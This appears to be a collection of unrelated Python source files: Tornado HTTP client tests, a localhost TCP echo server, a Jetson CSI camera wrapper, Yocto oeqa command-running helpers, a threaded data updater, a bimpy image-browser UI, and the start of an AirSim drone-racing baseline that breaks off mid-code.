)
self.assertEqual(response.headers["Content-Length"], "2")
self.assertEqual(response.body, utf8(unicode_body))
# byte strings pass through directly
response = self.fetch(
"/echopost",
method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"},
)
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
# Mixing unicode in headers and byte string bodies shouldn't
# break anything
response = self.fetch(
"/echopost",
method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"},
user_agent=u"foo",
)
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
def test_types(self):
response = self.fetch("/hello")
self.assertEqual(type(response.body), bytes)
self.assertEqual(type(response.headers["Content-Type"]), str)
self.assertEqual(type(response.code), int)
self.assertEqual(type(response.effective_url), str)
def test_header_callback(self):
first_line = []
headers = {}
chunks = []
def header_callback(header_line):
if header_line.startswith("HTTP/1.1 101"):
# Upgrading to HTTP/2
pass
elif header_line.startswith("HTTP/"):
first_line.append(header_line)
elif header_line != "\r\n":
k, v = header_line.split(":", 1)
headers[k.lower()] = v.strip()
def streaming_callback(chunk):
# All header callbacks are run before any streaming callbacks,
# so the header data is available to process the data as it
# comes in.
self.assertEqual(headers["content-type"], "text/html; charset=UTF-8")
chunks.append(chunk)
self.fetch(
"/chunk",
header_callback=header_callback,
streaming_callback=streaming_callback,
)
self.assertEqual(len(first_line), 1, first_line)
self.assertRegexpMatches(first_line[0], "HTTP/[0-9]\\.[0-9] 200.*\r\n")
self.assertEqual(chunks, [b"asdf", b"qwer"])
@gen_test
def test_configure_defaults(self):
defaults = dict(user_agent="TestDefaultUserAgent", allow_ipv6=False)
# Construct a new instance of the configured client class
client = self.http_client.__class__(force_instance=True, defaults=defaults)
try:
response = yield client.fetch(self.get_url("/user_agent"))
self.assertEqual(response.body, b"TestDefaultUserAgent")
finally:
client.close()
def test_header_types(self):
# Header values may be passed as character or utf8 byte strings,
# in a plain dictionary or an HTTPHeaders object.
# Keys must always be the native str type.
# All combinations should have the same results on the wire.
for value in [u"MyUserAgent", b"MyUserAgent"]:
for container in [dict, HTTPHeaders]:
headers = container()
headers["User-Agent"] = value
resp = self.fetch("/user_agent", headers=headers)
self.assertEqual(
resp.body,
b"MyUserAgent",
"response=%r, value=%r, container=%r"
% (resp.body, value, container),
)
def test_multi_line_headers(self):
# Multi-line http headers are rare but rfc-allowed
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec4.html#sec4.2
sock, port = bind_unused_port()
with closing(sock):
@gen.coroutine
def accept_callback(conn, address):
stream = IOStream(conn)
request_data = yield stream.read_until(b"\r\n\r\n")
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
yield stream.write(
b"""\
HTTP/1.1 200 OK
X-XSS-Protection: 1;
\tmode=block
""".replace(
b"\n", b"\r\n"
)
)
stream.close()
netutil.add_accept_handler(sock, accept_callback) # type: ignore
resp = self.fetch("http://127.0.0.1:%d/" % port)
resp.rethrow()
self.assertEqual(resp.headers["X-XSS-Protection"], "1; mode=block")
self.io_loop.remove_handler(sock.fileno())
def test_304_with_content_length(self):
# According to the spec 304 responses SHOULD NOT include
# Content-Length or other entity headers, but some servers do it
# anyway.
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.5
response = self.fetch("/304_with_content_length")
self.assertEqual(response.code, 304)
self.assertEqual(response.headers["Content-Length"], "42")
@gen_test
def test_future_interface(self):
response = yield self.http_client.fetch(self.get_url("/hello"))
self.assertEqual(response.body, b"Hello world!")
@gen_test
def test_future_http_error(self):
with self.assertRaises(HTTPError) as context:
yield self.http_client.fetch(self.get_url("/notfound"))
self.assertEqual(context.exception.code, 404)
self.assertEqual(context.exception.response.code, 404)
@gen_test
def test_future_http_error_no_raise(self):
response = yield self.http_client.fetch(
self.get_url("/notfound"), raise_error=False
)
self.assertEqual(response.code, 404)
@gen_test
def test_reuse_request_from_response(self):
# The response.request attribute should be an HTTPRequest, not
# a _RequestProxy.
# This test uses self.http_client.fetch because self.fetch calls
# self.get_url on the input unconditionally.
url = self.get_url("/hello")
response = yield self.http_client.fetch(url)
self.assertEqual(response.request.url, url)
self.assertTrue(isinstance(response.request, HTTPRequest))
response2 = yield self.http_client.fetch(response.request)
self.assertEqual(response2.body, b"Hello world!")
def test_all_methods(self):
for method in ["GET", "DELETE", "OPTIONS"]:
response = self.fetch("/all_methods", method=method)
self.assertEqual(response.body, utf8(method))
for method in ["POST", "PUT", "PATCH"]:
response = self.fetch("/all_methods", method=method, body=b"")
self.assertEqual(response.body, utf8(method))
response = self.fetch("/all_methods", method="HEAD")
self.assertEqual(response.body, b"")
response = self.fetch(
"/all_methods", method="OTHER", allow_nonstandard_methods=True
)
self.assertEqual(response.body, b"OTHER")
def test_body_sanity_checks(self):
# These methods require a body.
for method in ("POST", "PUT", "PATCH"):
with self.assertRaises(ValueError) as context:
self.fetch("/all_methods", method=method, raise_error=True)
self.assertIn("must not be None", str(context.exception))
resp = self.fetch(
"/all_methods", method=method, allow_nonstandard_methods=True
)
self.assertEqual(resp.code, 200)
# These methods don't allow a body.
for method in ("GET", "DELETE", "OPTIONS"):
with self.assertRaises(ValueError) as context:
self.fetch(
"/all_methods", method=method, body=b"asdf", raise_error=True
)
self.assertIn("must be None", str(context.exception))
# In most cases this can be overridden, but curl_httpclient
# does not allow body with a GET at all.
if method != "GET":
self.fetch(
"/all_methods",
method=method,
body=b"asdf",
allow_nonstandard_methods=True,
raise_error=True,
)
self.assertEqual(resp.code, 200)
# This test causes odd failures with the combination of
# curl_httpclient (at least with the version of libcurl available
# on ubuntu 12.04), TwistedIOLoop, and epoll. For POST (but not PUT),
# curl decides the response came back too soon and closes the connection
# to start again. It does this *before* telling the socket callback to
# unregister the FD. Some IOLoop implementations have special kernel
# integration to discover this immediately. Tornado's IOLoops
# ignore errors on remove_handler to accommodate this behavior, but
# Twisted's reactor does not. The removeReader call fails and so
# do all future removeAll calls (which our tests do at cleanup).
#
# def test_post_307(self):
# response = self.fetch("/redirect?status=307&url=/post",
# method="POST", body=b"arg1=foo&arg2=bar")
# self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_put_307(self):
response = self.fetch(
"/redirect?status=307&url=/put", method="PUT", body=b"hello"
)
response.rethrow()
self.assertEqual(response.body, b"Put body: hello")
def test_non_ascii_header(self):
# Non-ascii headers are sent as latin1.
response = self.fetch("/set_header?k=foo&v=%E9")
response.rethrow()
self.assertEqual(response.headers["Foo"], native_str(u"\u00e9"))
def test_response_times(self):
# A few simple sanity checks of the response time fields to
# make sure they're using the right basis (between the
# wall-time and monotonic clocks).
start_time = time.time()
response = self.fetch("/hello")
response.rethrow()
self.assertGreaterEqual(response.request_time, 0)
self.assertLess(response.request_time, 1.0)
# A very crude check to make sure that start_time is based on
# wall time and not the monotonic clock.
self.assertLess(abs(response.start_time - start_time), 1.0)
for k, v in response.time_info.items():
self.assertTrue(0 <= v < 1.0, "time_info[%s] out of bounds: %s" % (k, v))
class RequestProxyTest(unittest.TestCase):
def test_request_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/", user_agent="foo"), dict()
)
self.assertEqual(proxy.user_agent, "foo")
def test_default_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/"), dict(network_interface="foo")
)
self.assertEqual(proxy.network_interface, "foo")
def test_both_set(self):
proxy = _RequestProxy(
HTTPRequest("http://example.com/", proxy_host="foo"), dict(proxy_host="bar")
)
self.assertEqual(proxy.proxy_host, "foo")
def test_neither_set(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), dict())
self.assertIs(proxy.auth_username, None)
def test_bad_attribute(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), dict())
with self.assertRaises(AttributeError):
proxy.foo
def test_defaults_none(self):
proxy = _RequestProxy(HTTPRequest("http://example.com/"), None)
self.assertIs(proxy.auth_username, None)
class HTTPResponseTestCase(unittest.TestCase):
def test_str(self):
response = HTTPResponse( # type: ignore
HTTPRequest("http://example.com"), 200, headers={}, buffer=BytesIO()
)
s = str(response)
self.assertTrue(s.startswith("HTTPResponse("))
self.assertIn("code=200", s)
class SyncHTTPClientTest(unittest.TestCase):
def setUp(self):
self.server_ioloop = IOLoop()
event = threading.Event()
@gen.coroutine
def init_server():
sock, self.port = bind_unused_port()
app = Application([("/", HelloWorldHandler)])
self.server = HTTPServer(app)
self.server.add_socket(sock)
event.set()
def start():
self.server_ioloop.run_sync(init_server)
self.server_ioloop.start()
self.server_thread = threading.Thread(target=start)
self.server_thread.start()
event.wait()
self.http_client = HTTPClient()
def tearDown(self):
def stop_server():
self.server.stop()
# Delay the shutdown of the IOLoop by several iterations because
# the server may still have some cleanup work left when
# the client finishes with the response (this is noticeable
# with http/2, which leaves a Future with an unexamined
# StreamClosedError on the loop).
@gen.coroutine
def slow_stop():
# The number of iterations is difficult to predict. Typically,
# one is sufficient, although sometimes it needs more.
for i in range(5):
yield
self.server_ioloop.stop()
self.server_ioloop.add_callback(slow_stop)
self.server_ioloop.add_callback(stop_server)
self.server_thread.join()
self.http_client.close()
self.server_ioloop.close(all_fds=True)
def get_url(self, path):
return "http://127.0.0.1:%d%s" % (self.port, path)
def test_sync_client(self):
response = self.http_client.fetch(self.get_url("/"))
self.assertEqual(b"Hello world!", response.body)
def test_sync_client_error(self):
# Synchronous HTTPClient raises errors directly; no need for
# response.rethrow()
with self.assertRaises(HTTPError) as assertion:
self.http_client.fetch(self.get_url("/notfound"))
self.assertEqual(assertion.exception.code, 404)
class HTTPRequestTestCase(unittest.TestCase):
def test_headers(self):
request = HTTPRequest("http://example.com", headers={"foo": "bar"})
self.assertEqual(request.headers, {"foo": "bar"})
def test_headers_setter(self):
request = HTTPRequest("http://example.com")
request.headers = {"bar": "baz"} # type: ignore
self.assertEqual(request.headers, {"bar": "baz"})
def test_null_headers_setter(self):
request = HTTPRequest("http://example.com")
request.headers = None # type: ignore
self.assertEqual(request.headers, {})
def test_body(self):
request = HTTPRequest("http://example.com", body="foo")
self.assertEqual(request.body, utf8("foo"))
def test_body_setter(self):
request = HTTPRequest("http://example.com")
request.body = "foo" # type: ignore
self.assertEqual(request.body, utf8("foo"))
def test_if_modified_since(self):
http_date = datetime.datetime.utcnow()
request = HTTPRequest("http://example.com", if_modified_since=http_date)
self.assertEqual(
request.headers, {"If-Modified-Since": format_timestamp(http_date)}
)
class HTTPErrorTestCase(unittest.TestCase):
def test_copy(self):
e = HTTPError(403)
e2 = copy.copy(e)
self.assertIsNot(e, e2)
self.assertEqual(e.code, e2.code)
def test_plain_error(self):
e = HTTPError(403)
self.assertEqual(str(e), "HTTP 403: Forbidden")
self.assertEqual(repr(e), "HTTP 403: Forbidden")
def test_error_with_response(self):
resp = HTTPResponse(HTTPRequest("http://example.com/"), 403)
with self.assertRaises(HTTPError) as cm:
resp.rethrow()
e = cm.exception
self.assertEqual(str(e), "HTTP 403: Forbidden")
self.assertEqual(repr(e), "HTTP 403: Forbidden")
|
tcp_server.py
|
import socket
import threading
bind_ip = "127.0.0.1"
bind_port = 4567
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
# 最大连接数5
server.listen(5)
print("[*] 监听中:%s:%d" %(bind_ip, bind_port))
# 处理客户端线程
def handle_client(client_socket):
# 输出客户端发来的数据
request = client_socket.recv(1024)
print('[*] 收到:%s' % request)
# 返回数据
client_socket.send(b"ack!")
client_socket.close()
# 启动
while(True):
client, addr = server.accept()
print('[*] 接收数据:%s:%d' % (addr[0], addr[1]))
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
|
csi_camera.py
|
# MIT License
# Copyright (c) 2019,2020 JetsonHacks
# See license in root folder
# CSI_Camera is a class which encapsulates an OpenCV VideoCapture element
# The VideoCapture element is initialized via a GStreamer pipeline
# The camera is read in a separate thread
# The class also tracks how many frames are read from the camera;
# The calling application tracks the frames_displayed
# Let's use a repeating Timer for counting FPS
import cv2
import threading
class RepeatTimer(threading.Timer):
def run(self):
while not self.finished.wait(self.interval):
self.function(*self.args, **self.kwargs)
class CSI_Camera:
def __init__ (self) :
# Initialize instance variables
# OpenCV video capture element
self.video_capture = None
# The last captured image from the camera
self.frame = None
self.grabbed = False
# The thread where the video capture runs
self.read_thread = None
self.read_lock = threading.Lock()
self.running = False
self.fps_timer=None
self.frames_read=0
self.frames_displayed=0
self.last_frames_read=0
self.last_frames_displayed=0
def open(self, gstreamer_pipeline_string):
try:
self.video_capture = cv2.VideoCapture(
gstreamer_pipeline_string, cv2.CAP_GSTREAMER
)
except RuntimeError:
self.video_capture = None
print("Unable to open camera")
print("Pipeline: " + gstreamer_pipeline_string)
return
# Grab the first frame to start the video capturing
self.grabbed, self.frame = self.video_capture.read()
def start(self):
if self.running:
print('Video capturing is already running')
return None
# create a thread to read the camera image
if self.video_capture != None:
self.running=True
self.read_thread = threading.Thread(target=self.updateCamera)
self.read_thread.start()
return self
def stop(self):
self.running=False
self.read_thread.join()
def updateCamera(self):
# This is the thread to read images from the camera
while self.running:
try:
grabbed, frame = self.video_capture.read()
with self.read_lock:
self.grabbed=grabbed
self.frame=frame
self.frames_read += 1
except RuntimeError:
print("Could not read image from camera")
# FIX ME - stop and cleanup thread
# Something bad happened
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed=self.grabbed
return grabbed, frame
def release(self):
if self.video_capture != None:
self.video_capture.release()
self.video_capture = None
# Kill the timer
self.fps_timer.cancel()
self.fps_timer.join()
# Now kill the thread
if self.read_thread != None:
self.read_thread.join()
def update_fps_stats(self):
self.last_frames_read=self.frames_read
self.last_frames_displayed=self.frames_displayed
# Start the next measurement cycle
self.frames_read=0
self.frames_displayed=0
def start_counting_fps(self):
self.fps_timer=RepeatTimer(1.0,self.update_fps_stats)
self.fps_timer.start()
@property
def gstreamer_pipeline(self):
return self._gstreamer_pipeline
# WS mod: Set the default framerate parameter to 21, the minimum for all modes: the sensor_mode
# overrides this anyway, so no need to use this parameter. It was found that if the
# framerate parameter exceeds the sensor_mode's default framerate setting (eg, 28 for
# mode 1) the program will core dump with a message that the framerate is exceeding
# the default, and a reboot of the nano is required to run again with the corrected
# framerate.
# Currently there are setting frame rate on CSI Camera on Nano through gstreamer
# Here we directly select sensor_mode 3 (1280x720, 59.9999 fps)
def create_gstreamer_pipeline(
self,
sensor_id=0,
sensor_mode=3,
display_width=1280,
display_height=720,
framerate=21,
flip_method=0,
):
self._gstreamer_pipeline = (
"nvarguscamerasrc sensor-id=%d sensor-mode=%d ! "
"video/x-raw(memory:NVMM), "
"format=(string)NV12, framerate=(fraction)%d/1 ! "
"nvvidconv flip-method=%d ! "
"video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! "
"videoconvert ! "
"video/x-raw, format=(string)BGR ! appsink"
% (
sensor_id,
sensor_mode,
framerate,
flip_method,
display_width,
display_height,
)
)
|
commands.py
|
#
# Copyright (c) 2013-2014 Intel Corporation
#
# SPDX-License-Identifier: MIT
#
# DESCRIPTION
# This module is mainly used by scripts/oe-selftest and modules under meta/oeqa/selftest
# It provides a class and methods for running commands on the host in a convienent way for tests.
import os
import sys
import signal
import subprocess
import threading
import time
import logging
from oeqa.utils import CommandError
from oeqa.utils import ftools
import re
import contextlib
# Export test doesn't require bb
try:
import bb
except ImportError:
pass
class Command(object):
def __init__(self, command, bg=False, timeout=None, data=None, output_log=None, **options):
self.defaultopts = {
"stdout": subprocess.PIPE,
"stderr": subprocess.STDOUT,
"stdin": None,
"shell": False,
"bufsize": -1,
}
self.cmd = command
self.bg = bg
self.timeout = timeout
self.data = data
self.options = dict(self.defaultopts)
if isinstance(self.cmd, str):
self.options["shell"] = True
if self.data:
self.options['stdin'] = subprocess.PIPE
self.options.update(options)
self.status = None
# We collect chunks of output before joining them at the end.
self._output_chunks = []
self._error_chunks = []
self.output = None
self.error = None
self.threads = []
self.output_log = output_log
self.log = logging.getLogger("utils.commands")
def run(self):
self.process = subprocess.Popen(self.cmd, **self.options)
def readThread(output, stream, logfunc):
if logfunc:
for line in stream:
output.append(line)
logfunc(line.decode("utf-8", errors='replace').rstrip())
else:
output.append(stream.read())
def readStderrThread():
readThread(self._error_chunks, self.process.stderr, self.output_log.error if self.output_log else None)
def readStdoutThread():
readThread(self._output_chunks, self.process.stdout, self.output_log.info if self.output_log else None)
def writeThread():
try:
self.process.stdin.write(self.data)
self.process.stdin.close()
except OSError as ex:
# It's not an error when the command does not consume all
# of our data. subprocess.communicate() also ignores that.
if ex.errno != EPIPE:
raise
# We write in a separate thread because then we can read
# without worrying about deadlocks. The additional thread is
# expected to terminate by itself and we mark it as a daemon,
# so even it should happen to not terminate for whatever
# reason, the main process will still exit, which will then
# kill the write thread.
if self.data:
thread = threading.Thread(target=writeThread, daemon=True)
thread.start()
self.threads.append(thread)
if self.process.stderr:
thread = threading.Thread(target=readStderrThread)
thread.start()
self.threads.append(thread)
if self.output_log:
self.output_log.info('Running: %s' % self.cmd)
thread = threading.Thread(target=readStdoutThread)
thread.start()
self.threads.append(thread)
self.log.debug("Running command '%s'" % self.cmd)
if not self.bg:
if self.timeout is None:
for thread in self.threads:
thread.join()
else:
deadline = time.time() + self.timeout
for thread in self.threads:
timeout = deadline - time.time()
if timeout < 0:
timeout = 0
thread.join(timeout)
self.stop()
def stop(self):
for thread in self.threads:
if thread.is_alive():
self.process.terminate()
# let's give it more time to terminate gracefully before killing it
thread.join(5)
if thread.is_alive():
self.process.kill()
thread.join()
def finalize_output(data):
if not data:
data = ""
else:
data = b"".join(data)
data = data.decode("utf-8", errors='replace').rstrip()
return data
self.output = finalize_output(self._output_chunks)
self._output_chunks = None
# self.error used to be a byte string earlier, probably unintentionally.
# Now it is a normal string, just like self.output.
self.error = finalize_output(self._error_chunks)
self._error_chunks = None
# At this point we know that the process has closed stdout/stderr, so
# it is safe and necessary to wait for the actual process completion.
self.status = self.process.wait()
self.process.stdout.close()
if self.process.stderr:
self.process.stderr.close()
self.log.debug("Command '%s' returned %d as exit code." % (self.cmd, self.status))
# logging the complete output is insane
# bitbake -e output is really big
# and makes the log file useless
if self.status:
lout = "\n".join(self.output.splitlines()[-20:])
self.log.debug("Last 20 lines:\n%s" % lout)
class Result(object):
pass
def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=True,
native_sysroot=None, limit_exc_output=0, output_log=None, **options):
result = Result()
if native_sysroot:
extra_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin" % \
(native_sysroot, native_sysroot, native_sysroot)
nenv = dict(options.get('env', os.environ))
nenv['PATH'] = extra_paths + ':' + nenv.get('PATH', '')
options['env'] = nenv
cmd = Command(command, timeout=timeout, output_log=output_log, **options)
cmd.run()
# tests can be heavy on IO and if bitbake can't write out its caches, we see timeouts.
# call sync around the tests to ensure the IO queue doesn't get too large, taking any IO
# hit here rather than in bitbake shutdown.
if sync:
p = os.environ['PATH']
os.environ['PATH'] = "/usr/bin:/bin:/usr/sbin:/sbin:" + p
os.system("sync")
os.environ['PATH'] = p
result.command = command
result.status = cmd.status
result.output = cmd.output
result.error = cmd.error
result.pid = cmd.process.pid
if result.status and not ignore_status:
exc_output = result.output
if limit_exc_output > 0:
split = result.output.splitlines()
if len(split) > limit_exc_output:
exc_output = "\n... (last %d lines of output)\n" % limit_exc_output + \
'\n'.join(split[-limit_exc_output:])
if assert_error:
raise AssertionError("Command '%s' returned non-zero exit status %d:\n%s" % (command, result.status, exc_output))
else:
raise CommandError(result.status, command, exc_output)
return result
def bitbake(command, ignore_status=False, timeout=None, postconfig=None, output_log=None, **options):
if postconfig:
postconfig_file = os.path.join(os.environ.get('BUILDDIR'), 'oeqa-post.conf')
ftools.write_file(postconfig_file, postconfig)
extra_args = "-R %s" % postconfig_file
else:
extra_args = ""
if isinstance(command, str):
cmd = "bitbake " + extra_args + " " + command
else:
cmd = [ "bitbake" ] + [a for a in (command + extra_args.split(" ")) if a not in [""]]
try:
return runCmd(cmd, ignore_status, timeout, output_log=output_log, **options)
finally:
if postconfig:
os.remove(postconfig_file)
def get_bb_env(target=None, postconfig=None):
if target:
return bitbake("-e %s" % target, postconfig=postconfig).output
else:
return bitbake("-e", postconfig=postconfig).output
def get_bb_vars(variables=None, target=None, postconfig=None):
"""Get values of multiple bitbake variables"""
bbenv = get_bb_env(target, postconfig=postconfig)
if variables is not None:
variables = list(variables)
var_re = re.compile(r'^(export )?(?P<var>\w+(_.*)?)="(?P<value>.*)"$')
unset_re = re.compile(r'^unset (?P<var>\w+)$')
lastline = None
values = {}
for line in bbenv.splitlines():
match = var_re.match(line)
val = None
if match:
val = match.group('value')
else:
match = unset_re.match(line)
if match:
# Handle [unexport] variables
if lastline.startswith('# "'):
val = lastline.split('"')[1]
if val:
var = match.group('var')
if variables is None:
values[var] = val
else:
if var in variables:
values[var] = val
variables.remove(var)
# Stop after all required variables have been found
if not variables:
break
lastline = line
if variables:
# Fill in missing values
for var in variables:
values[var] = None
return values
def get_bb_var(var, target=None, postconfig=None):
return get_bb_vars([var], target, postconfig)[var]
def get_test_layer():
layers = get_bb_var("BBLAYERS").split()
testlayer = None
for l in layers:
if '~' in l:
l = os.path.expanduser(l)
if "/meta-selftest" in l and os.path.isdir(l):
testlayer = l
break
return testlayer
def create_temp_layer(templayerdir, templayername, priority=999, recipepathspec='recipes-*/*'):
os.makedirs(os.path.join(templayerdir, 'conf'))
with open(os.path.join(templayerdir, 'conf', 'layer.conf'), 'w') as f:
f.write('BBPATH .= ":${LAYERDIR}"\n')
f.write('BBFILES += "${LAYERDIR}/%s/*.bb \\' % recipepathspec)
f.write(' ${LAYERDIR}/%s/*.bbappend"\n' % recipepathspec)
f.write('BBFILE_COLLECTIONS += "%s"\n' % templayername)
f.write('BBFILE_PATTERN_%s = "^${LAYERDIR}/"\n' % templayername)
f.write('BBFILE_PRIORITY_%s = "%d"\n' % (templayername, priority))
f.write('BBFILE_PATTERN_IGNORE_EMPTY_%s = "1"\n' % templayername)
f.write('LAYERSERIES_COMPAT_%s = "${LAYERSERIES_COMPAT_core}"\n' % templayername)
@contextlib.contextmanager
def runqemu(pn, ssh=True, runqemuparams='', image_fstype=None, launch_cmd=None, qemuparams=None, overrides={}, discard_writes=True):
"""
launch_cmd means directly run the command, don't need set rootfs or env vars.
"""
import bb.tinfoil
import bb.build
# Need a non-'BitBake' logger to capture the runner output
targetlogger = logging.getLogger('TargetRunner')
targetlogger.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
targetlogger.addHandler(handler)
tinfoil = bb.tinfoil.Tinfoil()
tinfoil.prepare(config_only=False, quiet=True)
try:
tinfoil.logger.setLevel(logging.WARNING)
import oeqa.targetcontrol
recipedata = tinfoil.parse_recipe(pn)
recipedata.setVar("TEST_LOG_DIR", "${WORKDIR}/testimage")
recipedata.setVar("TEST_QEMUBOOT_TIMEOUT", "1000")
# Tell QemuTarget() whether need find rootfs/kernel or not
if launch_cmd:
recipedata.setVar("FIND_ROOTFS", '0')
else:
recipedata.setVar("FIND_ROOTFS", '1')
for key, value in overrides.items():
recipedata.setVar(key, value)
logdir = recipedata.getVar("TEST_LOG_DIR")
qemu = oeqa.targetcontrol.QemuTarget(recipedata, targetlogger, image_fstype)
finally:
# We need to shut down tinfoil early here in case we actually want
# to run tinfoil-using utilities with the running QEMU instance.
# Luckily QemuTarget doesn't need it after the constructor.
tinfoil.shutdown()
try:
qemu.deploy()
try:
qemu.start(params=qemuparams, ssh=ssh, runqemuparams=runqemuparams, launch_cmd=launch_cmd, discard_writes=discard_writes)
except Exception as e:
msg = str(e) + '\nFailed to start QEMU - see the logs in %s' % logdir
if os.path.exists(qemu.qemurunnerlog):
with open(qemu.qemurunnerlog, 'r') as f:
msg = msg + "Qemurunner log output from %s:\n%s" % (qemu.qemurunnerlog, f.read())
raise Exception(msg)
yield qemu
finally:
targetlogger.removeHandler(handler)
qemu.stop()
def updateEnv(env_file):
"""
Source a file and update environment.
"""
cmd = ". %s; env -0" % env_file
result = runCmd(cmd)
for line in result.output.split("\0"):
(key, _, value) = line.partition("=")
os.environ[key] = value
|
update.py
|
from threading import Thread
from datums_warehouse.db import make_warehouse
def update_pairs(cfg, pairs):
def update_pair(wh_cfg, pair):
wh = make_warehouse(wh_cfg)
wh.update(pair)
processes = [Thread(target=update_pair, name=f"process: {p}", args=(cfg, p)) for p in pairs]
for prc in processes:
prc.start()
for prc in processes:
prc.join()
|
file_broswer.py
|
# -*- coding:utf-8 -*-
import bimpy
from glob import glob
from multiprocessing import Process, Queue
import pickle
from Modules.i18n import LANG_EN as LANG
from Modules.conf import conf
from Modules.preprocess import preprocess
class file_broswer:
file_list = []
q = Queue()
def __init__(self):
self.refresh_file_list()
def refresh_file_list(self):
self.file_list = glob('pictures\*.*')
self.pp = preprocess()
self.pp.update_file_list(self.file_list)
def startprocess(self):
p = Process(target=self.preprocess, args=(self.pp, self.q))
p.start()
def preprocess(self, p=None, q=None):
for i in p.process():
q.put(i)
def refresh(self):
self.pp.yolo_res = {}
q = Queue()
self.pp.update_file_list(self.file_list)
self.startprocess()
class file_brewswer_ui:
fb = file_broswer()
preidx = -1
selected = bimpy.Int(-1)
im = None
process = (0, len(fb.file_list))
def render(self, ctx, windows_info):
pos = bimpy.Vec2(conf.margin, conf.margin)
size_min = bimpy.Vec2(conf.min_file_browser_width,
ctx.height() - 2 * conf.margin)
size_max = bimpy.Vec2(conf.max_file_browser_width,
ctx.height() - 2 * conf.margin)
bimpy.set_next_window_pos(pos, bimpy.Condition.Once)
bimpy.set_next_window_size_constraints(size_min, size_max)
bimpy.begin(LANG.file_brewswer_ui_title, bimpy.Bool(True),
bimpy.WindowFlags.NoCollapse |
bimpy.WindowFlags.NoMove)
###########UI###########
if bimpy.button(LANG.file_brewswer_ui_refresh) == True:
self.fb.refresh_file_list()
bimpy.same_line()
if bimpy.button(LANG.about) == True:
bimpy.open_popup(LANG.about)
# call render about ui
# print(dir(windows_info['about_ui']))
windows_info['about_ui']['self'].about()
for idx, f_name in enumerate(self.fb.file_list):
# print(self.selected.value)
if bimpy.selectable(f_name.split('\\')[-1], self.selected.value == idx):
self.selected.value = idx
if self.selected.value != -1 and self.selected.value != self.preidx:
self.preidx = self.selected.value
windows_info['image_shower_ui']['self'].update_pic(f_name)
windows_info['meta_info_ui']['self'].update_meta_info(f_name)
# progress bar
if not self.fb.q.empty():
self.process = self.fb.q.get()
f, d = self.process[-2], self.process[-1]
# update if new
if d != {}:
self.fb.pp.yolo_res[f] = d
self.process = (self.process[0] + 1, self.process[1])
if self.process[0] == self.process[1]:
with open('yolo_res', 'wb') as f:
pickle.dump(self.fb.pp.yolo_res, f)
# build retrieval index
windows_info['retrival_ui']['self'].init = False
sz = bimpy.get_window_size()
bimpy.set_cursor_pos(bimpy.Vec2(conf.margin, sz.y - conf.margin * 2))
bimpy.push_item_width(sz.x - conf.margin * 3 - 60)
process = self.process
bimpy.progress_bar(process[0] / float(process[1]),
bimpy.Vec2(0.0, 0.0),
"{}/{}".format(process[0], process[1]))
bimpy.same_line()
if bimpy.button(LANG.reindex) == True and process[0] == process[1]:
self.fb.refresh()
########################
t = {
'x': bimpy.get_window_pos().x,
'y': bimpy.get_window_pos().y,
'w': bimpy.get_window_size().x,
'h': bimpy.get_window_size().y,
'self': self,
}
bimpy.end()
return t
|
baseline_racer.py
|
from argparse import ArgumentParser
import airsimneurips as airsim
# import cv2
import threading
import time
import utils
import numpy as np
import math
# drone_name should match the name in ~/Document/AirSim/settings.json
class BaselineRacer(object):
def __init__(self, drone_name = "drone_1", viz_traj=True, viz_traj_color_rgba=[1.0, 0.0, 0.0, 1.0], viz_image_cv2=True):
self.drone_name = drone_name
self.gate_poses_ground_truth = None
self.state = None # drone state
self.viz_image_cv2 = viz_image_cv2
self.viz_traj = viz_traj
self.viz_traj_color_rgba = viz_traj_color_rgba
self.airsim_client = airsim.MultirotorClient()
self.airsim_client.confirmConnection()
self.gate_inner_dims = self.airsim_client.simGetNominalGateInnerDimensions()
self.gate_outer_dims = self.airsim_client.simGetNominalGateOuterDimensions()
# self.get_ground_truth_gate_poses()
# we need two airsim MultirotorClient objects because the comm lib we use (rpclib) is not thread safe
# so we poll images in a thread using one airsim MultirotorClient object
# and use another airsim MultirotorClient for querying state commands
self.airsim_client_images = airsim.MultirotorClient()
self.airsim_client_images.confirmConnection()
self.airsim_client_odom = airsim.MultirotorClient()
self.airsim_client_odom.confirmConnection()
self.level_name = None
self.image_callback_thread = threading.Thread(target=self.repeat_timer_image_callback, args=(self.image_callback, 0.03))
self.odometry_callback_thread = threading.Thread(target=self.repeat_timer_odometry_callback, args=(self.odometry_callback, 0.02))
self.is_image_thread_active = False
self.is_odometry_thread_active = False
self.MAX_NUMBER_OF_GETOBJECTPOSE_TRIALS = 10 # see https://github.com/microsoft/AirSim-NeurIPS2019-Drone-Racing/issues/38
# loads desired level
def load_level(self, level_name, sleep_sec = 2.0):
self.level_name = level_name
self.airsim_client.simLoadLevel(self.level_name)
self.airsim_client.confirmConnection() # failsafe
time.sleep(sleep_sec) # let the environment load completely
# Starts an instance of a race in your given level, if valid
def start_race(self, tier=3):
self.airsim_client.simStartRace(tier)
# Resets a current race: moves players to start positions, timer and penalties reset
def reset_race(self):
self.airsim_client.simResetRace()
# arms drone, enable APIs, set default traj tracker gains
def initialize_drone(self):
self.airsim_client.enableApiControl(vehicle_name=self.drone_name)
self.airsim_client.arm(vehicle_name=self.drone_name)
# set default values for trajectory tracker gains
traj_tracker_gains = airsim.TrajectoryTrackerGains(kp_cross_track = 5.0, kd_cross_track = 0.0,
kp_vel_cross_track = 3.0, kd_vel_cross_track = 0.0,
kp_along_track = 0.4, kd_along_track = 0.0,
kp_vel_along_track = 0.04, kd_vel_along_track = 0.0,
